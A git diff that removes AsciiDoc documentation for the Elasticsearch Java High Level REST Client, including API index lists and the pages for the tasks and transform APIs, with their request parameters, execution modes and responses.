<<{upid}-get-datafeed>> -* <<{upid}-get-datafeed-stats>> -* <<{upid}-get-filters>> -* <<{upid}-get-influencers>> -* <<{upid}-get-ml-info>> -* <<{upid}-get-model-snapshots>> -* <<{upid}-get-overall-buckets>> -* <<{upid}-get-records>> -* <<{upid}-get-trained-models>> -* <<{upid}-get-trained-models-stats>> -* <<{upid}-open-job>> -* <<{upid}-post-calendar-event>> -* <<{upid}-post-data>> -* <<{upid}-preview-datafeed>> -* <<{upid}-put-job>> -* <<{upid}-put-calendar-job>> -* <<{upid}-put-calendar>> -* <<{upid}-put-data-frame-analytics>> -* <<{upid}-put-datafeed>> -* <<{upid}-put-filter>> -* <<{upid}-put-trained-model>> -* <<{upid}-revert-model-snapshot>> -* <<{upid}-set-upgrade-mode>> -* <<{upid}-start-data-frame-analytics>> -* <<{upid}-start-datafeed>> -* <<{upid}-stop-data-frame-analytics>> -* <<{upid}-stop-datafeed>> -* <<{upid}-update-job>> -* <<{upid}-update-data-frame-analytics>> -* <<{upid}-update-datafeed>> -* <<{upid}-update-filter>> -* <<{upid}-update-model-snapshot>> - -// CLOSE -include::ml/close-job.asciidoc[] -// DELETE -include::ml/delete-job.asciidoc[] -include::ml/delete-calendar-job.asciidoc[] -include::ml/delete-calendar-event.asciidoc[] -include::ml/delete-calendar.asciidoc[] -include::ml/delete-data-frame-analytics.asciidoc[] -include::ml/delete-datafeed.asciidoc[] -include::ml/delete-expired-data.asciidoc[] -include::ml/delete-filter.asciidoc[] -include::ml/delete-forecast.asciidoc[] -include::ml/delete-model-snapshot.asciidoc[] -include::ml/delete-trained-models.asciidoc[] -// ESTIMATE -include::ml/estimate-model-memory.asciidoc[] -// EVALUATE -include::ml/evaluate-data-frame.asciidoc[] -// EXPLAIN -include::ml/explain-data-frame-analytics.asciidoc[] -// FIND -include::ml/find-file-structure.asciidoc[] -// FLUSH -include::ml/flush-job.asciidoc[] -// FORECAST -include::ml/forecast-job.asciidoc[] -// GET -include::ml/get-job.asciidoc[] -include::ml/get-job-stats.asciidoc[] -include::ml/get-buckets.asciidoc[] -include::ml/get-calendar-events.asciidoc[] -include::ml/get-calendars.asciidoc[] -include::ml/get-categories.asciidoc[] -include::ml/get-data-frame-analytics.asciidoc[] -include::ml/get-data-frame-analytics-stats.asciidoc[] -include::ml/get-datafeed.asciidoc[] -include::ml/get-datafeed-stats.asciidoc[] -include::ml/get-filters.asciidoc[] -include::ml/get-influencers.asciidoc[] -include::ml/get-info.asciidoc[] -include::ml/get-model-snapshots.asciidoc[] -include::ml/get-overall-buckets.asciidoc[] -include::ml/get-records.asciidoc[] -include::ml/get-trained-models.asciidoc[] -include::ml/get-trained-models-stats.asciidoc[] -// OPEN -include::ml/open-job.asciidoc[] -// POST -include::ml/post-calendar-event.asciidoc[] -include::ml/post-data.asciidoc[] -// PREVIEW -include::ml/preview-datafeed.asciidoc[] -// PUT -include::ml/put-job.asciidoc[] -include::ml/put-calendar-job.asciidoc[] -include::ml/put-calendar.asciidoc[] -include::ml/put-data-frame-analytics.asciidoc[] -include::ml/put-datafeed.asciidoc[] -include::ml/put-filter.asciidoc[] -include::ml/put-trained-model.asciidoc[] -// REVERT -include::ml/revert-model-snapshot.asciidoc[] -// SET -include::ml/set-upgrade-mode.asciidoc[] -// START -include::ml/start-data-frame-analytics.asciidoc[] -include::ml/start-datafeed.asciidoc[] -// STOP -include::ml/stop-data-frame-analytics.asciidoc[] -include::ml/stop-datafeed.asciidoc[] -// UPDATE -include::ml/update-job.asciidoc[] -include::ml/update-data-frame-analytics.asciidoc[] -include::ml/update-datafeed.asciidoc[] -include::ml/update-filter.asciidoc[] 
-include::ml/update-model-snapshot.asciidoc[] - -== Migration APIs - -:upid: {mainid}-migration -:doc-tests-file: {doc-tests}/MigrationClientDocumentationIT.java - -The Java High Level REST Client supports the following Migration APIs: - -* <<{upid}-get-deprecation-info>> - -include::migration/get-deprecation-info.asciidoc[] - -[role="xpack"] -== Rollup APIs - -:upid: {mainid}-rollup -:doc-tests-file: {doc-tests}/RollupDocumentationIT.java - -The Java High Level REST Client supports the following Rollup APIs: - -* <> -* <<{upid}-rollup-start-job>> -* <<{upid}-rollup-stop-job>> -* <<{upid}-rollup-delete-job>> -* <> -* <<{upid}-search>> -* <<{upid}-x-pack-rollup-get-rollup-caps>> -* <<{upid}-x-pack-rollup-get-rollup-index-caps>> - -include::rollup/put_job.asciidoc[] -include::rollup/start_job.asciidoc[] -include::rollup/stop_job.asciidoc[] -include::rollup/delete_job.asciidoc[] -include::rollup/get_job.asciidoc[] -include::rollup/search.asciidoc[] -include::rollup/get_rollup_caps.asciidoc[] -include::rollup/get_rollup_index_caps.asciidoc[] - -[role="xpack"] -== Security APIs - -:upid: {mainid}-security -:doc-tests-file: {doc-tests}/SecurityDocumentationIT.java - -The Java High Level REST Client supports the following Security APIs: - -* <> -* <<{upid}-get-users>> -* <<{upid}-delete-user>> -* <> -* <> -* <> -* <<{upid}-put-role>> -* <<{upid}-get-roles>> -* <> -* <<{upid}-clear-roles-cache>> -* <<{upid}-clear-privileges-cache>> -* <<{upid}-clear-realm-cache>> -* <<{upid}-clear-api-key-cache>> -* <<{upid}-authenticate>> -* <<{upid}-has-privileges>> -* <<{upid}-get-user-privileges>> -* <> -* <> -* <> -* <> -* <> -* <<{upid}-invalidate-token>> -* <<{upid}-get-builtin-privileges>> -* <<{upid}-get-privileges>> -* <<{upid}-put-privileges>> -* <<{upid}-delete-privileges>> -* <<{upid}-create-api-key>> -* <<{upid}-get-api-key>> -* <<{upid}-invalidate-api-key>> - -include::security/put-user.asciidoc[] -include::security/get-users.asciidoc[] -include::security/delete-user.asciidoc[] -include::security/enable-user.asciidoc[] -include::security/disable-user.asciidoc[] -include::security/change-password.asciidoc[] -include::security/put-role.asciidoc[] -include::security/get-roles.asciidoc[] -include::security/delete-role.asciidoc[] -include::security/delete-privileges.asciidoc[] -include::security/get-builtin-privileges.asciidoc[] -include::security/get-privileges.asciidoc[] -include::security/clear-roles-cache.asciidoc[] -include::security/clear-privileges-cache.asciidoc[] -include::security/clear-realm-cache.asciidoc[] -include::security/clear-api-key-cache.asciidoc[] -include::security/authenticate.asciidoc[] -include::security/has-privileges.asciidoc[] -include::security/get-user-privileges.asciidoc[] -include::security/get-certificates.asciidoc[] -include::security/put-role-mapping.asciidoc[] -include::security/get-role-mappings.asciidoc[] -include::security/delete-role-mapping.asciidoc[] -include::security/create-token.asciidoc[] -include::security/invalidate-token.asciidoc[] -include::security/put-privileges.asciidoc[] -include::security/create-api-key.asciidoc[] -include::security/get-api-key.asciidoc[] -include::security/invalidate-api-key.asciidoc[] - -[role="xpack"] -== Watcher APIs - -:upid: {mainid}-watcher -:doc-tests-file: {doc-tests}/WatcherDocumentationIT.java - -The Java High Level REST Client supports the following Watcher APIs: - -* <<{upid}-start-watch-service>> -* <<{upid}-stop-watch-service>> -* <> -* <<{upid}-get-watch>> -* <> -* <> -* <<{upid}-ack-watch>> -* 
<<{upid}-activate-watch>> -* <<{upid}-execute-watch>> -* <<{upid}-watcher-stats>> - -include::watcher/start-watch-service.asciidoc[] -include::watcher/stop-watch-service.asciidoc[] -include::watcher/put-watch.asciidoc[] -include::watcher/get-watch.asciidoc[] -include::watcher/delete-watch.asciidoc[] -include::watcher/ack-watch.asciidoc[] -include::watcher/deactivate-watch.asciidoc[] -include::watcher/activate-watch.asciidoc[] -include::watcher/execute-watch.asciidoc[] -include::watcher/watcher-stats.asciidoc[] - -[role="xpack"] -== Graph APIs - -The Java High Level REST Client supports the following Graph APIs: - -* <> - -include::graph/explore.asciidoc[] - -//// -Clear attributes that we use to document that APIs included above so they -don't leak into the rest of the documentation. -//// --- -:api!: -:request!: -:response!: -:doc-tests-file!: -:upid!: --- - -[role="xpack"] -== CCR APIs - -:upid: {mainid}-ccr -:doc-tests-file: {doc-tests}/CCRDocumentationIT.java - -The Java High Level REST Client supports the following CCR APIs: - -* <<{upid}-ccr-put-follow>> -* <<{upid}-ccr-pause-follow>> -* <<{upid}-ccr-resume-follow>> -* <<{upid}-ccr-unfollow>> -* <<{upid}-ccr-forget-follower>> -* <<{upid}-ccr-put-auto-follow-pattern>> -* <<{upid}-ccr-delete-auto-follow-pattern>> -* <<{upid}-ccr-get-auto-follow-pattern>> -* <<{upid}-ccr-pause-auto-follow-pattern>> -* <<{upid}-ccr-resume-auto-follow-pattern>> -* <<{upid}-ccr-get-stats>> -* <<{upid}-ccr-get-follow-stats>> -* <<{upid}-ccr-get-follow-info>> - -include::ccr/put_follow.asciidoc[] -include::ccr/pause_follow.asciidoc[] -include::ccr/resume_follow.asciidoc[] -include::ccr/unfollow.asciidoc[] -include::ccr/forget_follower.asciidoc[] -include::ccr/put_auto_follow_pattern.asciidoc[] -include::ccr/delete_auto_follow_pattern.asciidoc[] -include::ccr/get_auto_follow_pattern.asciidoc[] -include::ccr/pause_auto_follow_pattern.asciidoc[] -include::ccr/resume_auto_follow_pattern.asciidoc[] -include::ccr/get_stats.asciidoc[] -include::ccr/get_follow_stats.asciidoc[] -include::ccr/get_follow_info.asciidoc[] - -[role="xpack"] -== Index Lifecycle Management APIs - -:upid: {mainid}-ilm -:doc-tests-file: {doc-tests}/ILMDocumentationIT.java - -The Java High Level REST Client supports the following Index Lifecycle -Management APIs: - -* <<{upid}-ilm-put-lifecycle-policy>> -* <<{upid}-ilm-delete-lifecycle-policy>> -* <<{upid}-ilm-get-lifecycle-policy>> -* <<{upid}-ilm-explain-lifecycle>> -* <<{upid}-ilm-start-ilm>> -* <<{upid}-ilm-stop-ilm>> -* <<{upid}-ilm-status>> -* <<{upid}-ilm-retry-lifecycle-policy>> -* <<{upid}-ilm-remove-lifecycle-policy-from-index>> - - -include::ilm/put_lifecycle_policy.asciidoc[] -include::ilm/delete_lifecycle_policy.asciidoc[] -include::ilm/get_lifecycle_policy.asciidoc[] -include::ilm/explain_lifecycle.asciidoc[] -include::ilm/start_lifecycle_management.asciidoc[] -include::ilm/stop_lifecycle_management.asciidoc[] -include::ilm/lifecycle_management_status.asciidoc[] -include::ilm/retry_lifecycle_policy.asciidoc[] -include::ilm/remove_lifecycle_policy_from_index.asciidoc[] - -[role="xpack"] -== Snapshot Lifecycle Management APIs - -:upid: {mainid}-ilm -:doc-tests-file: {doc-tests}/ILMDocumentationIT.java - -The Java High Level REST Client supports the following Snapshot Lifecycle -Management APIs: - -* <<{upid}-slm-put-snapshot-lifecycle-policy>> -* <<{upid}-slm-delete-snapshot-lifecycle-policy>> -* <<{upid}-ilm-get-lifecycle-policy>> -* <<{upid}-slm-start-slm>> -* <<{upid}-slm-stop-slm>> -* <<{upid}-slm-status>> -* 
<<{upid}-slm-execute-snapshot-lifecycle-policy>> -* <<{upid}-slm-execute-snapshot-lifecycle-retention>> - - -include::ilm/put_snapshot_lifecycle_policy.asciidoc[] -include::ilm/delete_snapshot_lifecycle_policy.asciidoc[] -include::ilm/get_snapshot_lifecycle_policy.asciidoc[] -include::ilm/start_snapshot_lifecycle_management.asciidoc[] -include::ilm/stop_snapshot_lifecycle_management.asciidoc[] -include::ilm/snapshot_lifecycle_management_status.asciidoc[] -include::ilm/execute_snapshot_lifecycle_policy.asciidoc[] -include::ilm/execute_snapshot_lifecycle_retention.asciidoc[] - - -[role="xpack"] -[[transform_apis]] -== {transform-cap} APIs - -:upid: {mainid} -:doc-tests-file: {doc-tests}/TransformDocumentationIT.java - -The Java High Level REST Client supports the following {transform} -APIs: - -* <<{upid}-get-transform>> -* <<{upid}-get-transform-stats>> -* <<{upid}-put-transform>> -* <<{upid}-update-transform>> -* <<{upid}-delete-transform>> -* <<{upid}-preview-transform>> -* <<{upid}-start-transform>> -* <<{upid}-stop-transform>> - -include::transform/get_transform.asciidoc[] -include::transform/get_transform_stats.asciidoc[] -include::transform/put_transform.asciidoc[] -include::transform/update_transform.asciidoc[] -include::transform/delete_transform.asciidoc[] -include::transform/preview_transform.asciidoc[] -include::transform/start_transform.asciidoc[] -include::transform/stop_transform.asciidoc[] - -== Enrich APIs - -:upid: {mainid}-enrich -:doc-tests-file: {doc-tests}/EnrichDocumentationIT.java - -The Java High Level REST Client supports the following Enrich APIs: - -* <<{upid}-enrich-put-policy>> -* <<{upid}-enrich-delete-policy>> -* <<{upid}-enrich-get-policy>> -* <<{upid}-enrich-stats>> -* <<{upid}-enrich-execute-policy>> - -include::enrich/put_policy.asciidoc[] -include::enrich/delete_policy.asciidoc[] -include::enrich/get_policy.asciidoc[] -include::enrich/stats.asciidoc[] -include::enrich/execute_policy.asciidoc[] diff --git a/docs/java-rest/high-level/tasks/cancel_tasks.asciidoc b/docs/java-rest/high-level/tasks/cancel_tasks.asciidoc deleted file mode 100644 index 69c317efa82..00000000000 --- a/docs/java-rest/high-level/tasks/cancel_tasks.asciidoc +++ /dev/null @@ -1,84 +0,0 @@ -[[java-rest-high-cluster-cancel-tasks]] -=== Cancel Tasks API - -The Cancel Tasks API allows cancellation of a currently running task. - -==== Cancel Tasks Request - -A `CancelTasksRequest`: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/TasksClientDocumentationIT.java[cancel-tasks-request] --------------------------------------------------- -There are no required parameters. The task cancellation command supports the same -task selection parameters as the list tasks command. - -==== Parameters - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/TasksClientDocumentationIT.java[cancel-tasks-request-filter] --------------------------------------------------- -<1> Cancel a task -<2> Cancel only cluster-related tasks -<3> Should the request block until the cancellation of the task and its child tasks is completed. -Otherwise, the request can return soon after the cancellation is started. Defaults to `false`. 
-<4> Cancel all tasks running on nodes nodeId1 and nodeId2
-
-==== Synchronous Execution
-
-["source","java",subs="attributes,callouts,macros"]
---------------------------------------------------
-include-tagged::{doc-tests}/TasksClientDocumentationIT.java[cancel-tasks-execute]
---------------------------------------------------
-
-==== Asynchronous Execution
-
-The asynchronous execution requires a `CancelTasksRequest` instance and an
-`ActionListener` instance to be passed to the asynchronous method:
-
-["source","java",subs="attributes,callouts,macros"]
---------------------------------------------------
-include-tagged::{doc-tests}/TasksClientDocumentationIT.java[cancel-tasks-execute-async]
---------------------------------------------------
-<1> The `CancelTasksRequest` to execute and the `ActionListener` to use
-when the execution completes
-
-The asynchronous method does not block and returns immediately. Once it is
-completed the `ActionListener` is called back using the `onResponse` method
-if the execution successfully completed or using the `onFailure` method if
-it failed.
-
-A typical listener for `CancelTasksResponse` looks like:
-
-["source","java",subs="attributes,callouts,macros"]
---------------------------------------------------
-include-tagged::{doc-tests}/TasksClientDocumentationIT.java[cancel-tasks-execute-listener]
---------------------------------------------------
-<1> Called when the execution is successfully completed. The response is
-provided as an argument
-<2> Called in case of a failure. The raised exception is provided as an argument
-
-==== Cancel Tasks Response
-
-["source","java",subs="attributes,callouts,macros"]
---------------------------------------------------
-include-tagged::{doc-tests}/TasksClientDocumentationIT.java[cancel-tasks-response-tasks]
---------------------------------------------------
-<1> List of cancelled tasks
-
-["source","java",subs="attributes,callouts,macros"]
---------------------------------------------------
-include-tagged::{doc-tests}/TasksClientDocumentationIT.java[cancel-tasks-response-calc]
---------------------------------------------------
-<1> List of cancelled tasks grouped by a node
-<2> List of cancelled tasks grouped by a parent task
-
-["source","java",subs="attributes,callouts,macros"]
---------------------------------------------------
-include-tagged::{doc-tests}/TasksClientDocumentationIT.java[cancel-tasks-response-failures]
---------------------------------------------------
-<1> List of node failures
-<2> List of task cancellation failures
-
diff --git a/docs/java-rest/high-level/tasks/list_tasks.asciidoc b/docs/java-rest/high-level/tasks/list_tasks.asciidoc
deleted file mode 100644
index e60ca61247e..00000000000
--- a/docs/java-rest/high-level/tasks/list_tasks.asciidoc
+++ /dev/null
@@ -1,101 +0,0 @@
-[[java-rest-high-tasks-list]]
-=== List Tasks API
-
-The List Tasks API lets you get information about the tasks currently executing in the cluster.
-
-[[java-rest-high-cluster-list-tasks-request]]
-==== List Tasks Request
-
-A `ListTasksRequest`:
-
-["source","java",subs="attributes,callouts,macros"]
---------------------------------------------------
-include-tagged::{doc-tests}/TasksClientDocumentationIT.java[list-tasks-request]
---------------------------------------------------
-There are no required parameters. By default the client will list all tasks and will not wait
-for task completion.
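
In its simplest form, the request can therefore be created with defaults and executed directly, as
in this illustrative sketch (assuming an initialized `RestHighLevelClient` named `client`); the
parameters described below customize it further:

["source","java"]
--------------------------------------------------
// Hypothetical example: lists all tasks with default settings.
ListTasksRequest request = new ListTasksRequest();
ListTasksResponse response = client.tasks().list(request, RequestOptions.DEFAULT);
--------------------------------------------------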
-
-==== Parameters
-
-["source","java",subs="attributes,callouts,macros"]
---------------------------------------------------
-include-tagged::{doc-tests}/TasksClientDocumentationIT.java[list-tasks-request-filter]
---------------------------------------------------
-<1> Request only cluster-related tasks
-<2> Request all tasks running on nodes nodeId1 and nodeId2
-<3> Request only children of a particular task
-
-["source","java",subs="attributes,callouts,macros"]
---------------------------------------------------
-include-tagged::{doc-tests}/TasksClientDocumentationIT.java[list-tasks-request-detailed]
---------------------------------------------------
-<1> Whether the response should include detailed, potentially slow-to-generate data. Defaults to `false`
-
-["source","java",subs="attributes,callouts,macros"]
---------------------------------------------------
-include-tagged::{doc-tests}/TasksClientDocumentationIT.java[list-tasks-request-wait-completion]
---------------------------------------------------
-<1> Whether this request should wait for all found tasks to complete. Defaults to `false`
-<2> Timeout for the request as a `TimeValue`. Applicable only if `setWaitForCompletion` is `true`.
-Defaults to 30 seconds
-<3> Timeout as a `String`
-
-[[java-rest-high-cluster-list-tasks-sync]]
-==== Synchronous Execution
-
-["source","java",subs="attributes,callouts,macros"]
---------------------------------------------------
-include-tagged::{doc-tests}/TasksClientDocumentationIT.java[list-tasks-execute]
---------------------------------------------------
-
-[[java-rest-high-cluster-list-tasks-async]]
-==== Asynchronous Execution
-
-The asynchronous execution of a list tasks request requires both the
-`ListTasksRequest` instance and an `ActionListener` instance to be
-passed to the asynchronous method:
-
-["source","java",subs="attributes,callouts,macros"]
---------------------------------------------------
-include-tagged::{doc-tests}/TasksClientDocumentationIT.java[list-tasks-execute-async]
---------------------------------------------------
-<1> The `ListTasksRequest` to execute and the `ActionListener` to use
-when the execution completes
-
-The asynchronous method does not block and returns immediately. Once it is
-completed the `ActionListener` is called back using the `onResponse` method
-if the execution successfully completed or using the `onFailure` method if
-it failed.
-
-A typical listener for `ListTasksResponse` looks like:
-
-["source","java",subs="attributes,callouts,macros"]
---------------------------------------------------
-include-tagged::{doc-tests}/TasksClientDocumentationIT.java[list-tasks-execute-listener]
---------------------------------------------------
-<1> Called when the execution is successfully completed. The response is
-provided as an argument
-<2> Called in case of a failure.
The raised exception is provided as an argument - -[[java-rest-high-cluster-list-tasks-response]] -==== List Tasks Response - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/TasksClientDocumentationIT.java[list-tasks-response-tasks] --------------------------------------------------- -<1> List of currently running tasks - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/TasksClientDocumentationIT.java[list-tasks-response-calc] --------------------------------------------------- -<1> List of tasks grouped by a node -<2> List of tasks grouped by a parent task - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests}/TasksClientDocumentationIT.java[list-tasks-response-failures] --------------------------------------------------- -<1> List of node failures -<2> List of tasks failures diff --git a/docs/java-rest/high-level/transform/delete_transform.asciidoc b/docs/java-rest/high-level/transform/delete_transform.asciidoc deleted file mode 100644 index 8416ce40e37..00000000000 --- a/docs/java-rest/high-level/transform/delete_transform.asciidoc +++ /dev/null @@ -1,31 +0,0 @@ --- -:api: delete-transform -:request: DeleteTransformRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Delete {transform} API - -Deletes an existing {transform}. - -[id="{upid}-{api}-request"] -==== Delete {transform} request - -A +{request}+ object requires a non-null `id`. - -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] ---------------------------------------------------- -<1> Constructing a new request referencing an existing {transform} -<2> Sets the optional argument `force`. When `true`, the {transform} -is deleted regardless of its current state. The default value is `false`, -meaning that only `stopped` {transforms} can be deleted. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ object acknowledges the {transform} deletion. diff --git a/docs/java-rest/high-level/transform/get_transform.asciidoc b/docs/java-rest/high-level/transform/get_transform.asciidoc deleted file mode 100644 index 64aa0f229c4..00000000000 --- a/docs/java-rest/high-level/transform/get_transform.asciidoc +++ /dev/null @@ -1,49 +0,0 @@ --- -:api: get-transform -:request: GetTransformRequest -:response: GetTransformResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get {transform} API - -Retrieves configuration information about one or more {transforms}. -The API accepts a +{request}+ object and returns a +{response}+. - -[id="{upid}-{api}-request"] -==== Get {transform} request - -A +{request}+ requires either a {transform} ID, a comma separated list -of ids or the special wildcard `_all` to get all {transforms}. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new GET request referencing an existing {transform} - -==== Optional arguments - -The following arguments are optional. 
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-options] --------------------------------------------------- -<1> The page parameters `from` and `size`. `from` specifies the number of -{transforms} to skip. `size` specifies the maximum number of -{transforms} to get. Defaults to `0` and `100` respectively. -<2> Whether to ignore if a wildcard expression matches no {transforms}. - - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ contains the requested {transforms}. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- diff --git a/docs/java-rest/high-level/transform/get_transform_stats.asciidoc b/docs/java-rest/high-level/transform/get_transform_stats.asciidoc deleted file mode 100644 index cd2fcf2237c..00000000000 --- a/docs/java-rest/high-level/transform/get_transform_stats.asciidoc +++ /dev/null @@ -1,56 +0,0 @@ --- -:api: get-transform-stats -:request: GetTransformStatsRequest -:response: GetTransformStatsResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Get {transform} stats API - -Retrieves the operational statistics of one or more {transforms}. -The API accepts a +{request}+ object and returns a +{response}+. - -[id="{upid}-{api}-request"] -==== Get {transform} stats request - -A +{request}+ requires a {transform} id or the special wildcard `_all` -to get the statistics for all {transforms}. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> Constructing a new GET Stats request referencing an existing {transform} - -==== Optional arguments - -The following arguments are optional. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-options] --------------------------------------------------- -<1> The page parameters `from` and `size`. `from` specifies the number of -{transform} stats to skip. -`size` specifies the maximum number of {transform} stats to get. -Defaults to `0` and `100` respectively. -<2> Whether to ignore if a wildcard expression matches no {transforms}. - - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ contains the requested {transform} statistics. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-response] --------------------------------------------------- -<1> The response contains a list of `TransformStats` objects -<2> The running state of the {transform}, for example `started`, `indexing`, etc. -<3> The overall {transform} statistics recording the number of documents indexed etc. -<4> The progress of the current run in the {transform}. Supplies the number of docs left until the next checkpoint -and the total number of docs expected. -<5> The assigned node information if the task is currently assigned to a node and running. 
diff --git a/docs/java-rest/high-level/transform/preview_transform.asciidoc b/docs/java-rest/high-level/transform/preview_transform.asciidoc deleted file mode 100644 index 377aba597a6..00000000000 --- a/docs/java-rest/high-level/transform/preview_transform.asciidoc +++ /dev/null @@ -1,32 +0,0 @@ --- -:api: preview-transform -:request: PreviewTransformRequest -:response: PreviewTransformResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Preview {transform} API - -Previews the results of a {transform}. - -The API accepts a +{request}+ object as a request and returns a +{response}+. - -[id="{upid}-{api}-request"] -==== Preview {transform} request - -A +{request}+ takes a single argument: a valid {transform} config. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The source config from which the data should be gathered -<2> The pivot config used to transform the data -<3> The configuration of the {transform} to preview - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ contains the preview documents diff --git a/docs/java-rest/high-level/transform/put_transform.asciidoc b/docs/java-rest/high-level/transform/put_transform.asciidoc deleted file mode 100644 index 20aaaa74405..00000000000 --- a/docs/java-rest/high-level/transform/put_transform.asciidoc +++ /dev/null @@ -1,133 +0,0 @@ --- -:api: put-transform -:request: PutTransformRequest -:response: AcknowledgedResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Put {transform} API - -Creates a new {transform}. - -The API accepts a +{request}+ object as a request and returns a +{response}+. - -[id="{upid}-{api}-request"] -==== Put {transform} request - -A +{request}+ requires the following argument: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] --------------------------------------------------- -<1> The configuration of the {transform} to create -<2> Whether or not to wait to run deferrable validations until `_start` is called. -This option should be used with care as the created {transform} will run -with the privileges of the user creating it. Meaning, if they do not have privileges, -such an error will not be visible until `_start` is called. - -[id="{upid}-{api}-config"] -==== {transform-cap} configuration - -The `TransformConfig` object contains all the details about the -{transform} configuration and contains the following arguments: - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-config] --------------------------------------------------- -<1> The {transform} ID -<2> The source indices and query from which to gather data -<3> The destination index and optional pipeline -<4> How often to check for updates to the source indices -<5> The PivotConfig -<6> Optional free text description of the {transform} - -[id="{upid}-{api}-query-config"] - -==== SourceConfig - -The indices and the query from which to collect data. -If query is not set, a `match_all` query is used by default. 
- -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-source-config] --------------------------------------------------- - -==== DestConfig - -The index where to write the data and the optional pipeline -through which the docs should be indexed - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-dest-config] --------------------------------------------------- - -===== QueryConfig - -The query with which to select data from the source. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-query-config] --------------------------------------------------- - -==== PivotConfig - -Defines the pivot function `group by` fields and the aggregation to reduce the data. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-pivot-config] --------------------------------------------------- -<1> The `GroupConfig` to use in the pivot -<2> The aggregations to use - -===== GroupConfig -The grouping terms. Defines the group by and destination fields -which are produced by the pivot function. There are 3 types of -groups - -* Terms -* Histogram -* Date Histogram - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-group-config] --------------------------------------------------- -<1> The destination field -<2> Group by values of the `user_id` field - -===== AggregationConfig - -Defines the aggregations for the group fields. -// TODO link to the supported aggregations - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-agg-config] --------------------------------------------------- -<1> Aggregate the average star rating - -===== SettingsConfig - -Defines settings. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-settings-config] --------------------------------------------------- -<1> The maximum paging size for the {transform} when pulling data -from the source. The size dynamically adjusts as the {transform} -is running to recover from and prevent OOM issues. - -include::../execution.asciidoc[] - -[id="{upid}-{api}-response"] -==== Response - -The returned +{response}+ acknowledges the successful creation of -the new {transform} or an error if the configuration is invalid. diff --git a/docs/java-rest/high-level/transform/start_transform.asciidoc b/docs/java-rest/high-level/transform/start_transform.asciidoc deleted file mode 100644 index 9de2a0da23d..00000000000 --- a/docs/java-rest/high-level/transform/start_transform.asciidoc +++ /dev/null @@ -1,40 +0,0 @@ --- -:api: start-transform -:request: StartTransformRequest -:response: StartTransformResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Start {transform} API - -Starts a {transform}. -It accepts a +{request}+ object and responds with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Start {transform} request - -A +{request}+ object requires a non-null `id`. 
- -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] ---------------------------------------------------- -<1> Constructing a new start request referencing an existing -{transform} - -==== Optional arguments - -The following arguments are optional. - -["source","java",subs="attributes,callouts,macros"] --------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request-options] --------------------------------------------------- -<1> Controls the amount of time to wait until the {transform} starts. - -include::../execution.asciidoc[] - -==== Response - -The returned +{response}+ object acknowledges the {transform} has -started. diff --git a/docs/java-rest/high-level/transform/stop_transform.asciidoc b/docs/java-rest/high-level/transform/stop_transform.asciidoc deleted file mode 100644 index ce49434318d..00000000000 --- a/docs/java-rest/high-level/transform/stop_transform.asciidoc +++ /dev/null @@ -1,42 +0,0 @@ --- -:api: stop-transform -:request: StopTransformRequest -:response: StopTransformResponse --- -[role="xpack"] -[id="{upid}-{api}"] -=== Stop {transform} API - -Stops a started {transform}. -It accepts a +{request}+ object and responds with a +{response}+ object. - -[id="{upid}-{api}-request"] -==== Stop {transform} request - -A +{request}+ object requires a non-null `id`. `id` can be a comma separated -list of IDs or a single ID. Wildcards, `*` and `_all` are also accepted. - - -["source","java",subs="attributes,callouts,macros"] ---------------------------------------------------- -include-tagged::{doc-tests-file}[{api}-request] ---------------------------------------------------- -<1> Constructing a new stop request referencing an existing {transform}. - -==== Optional arguments 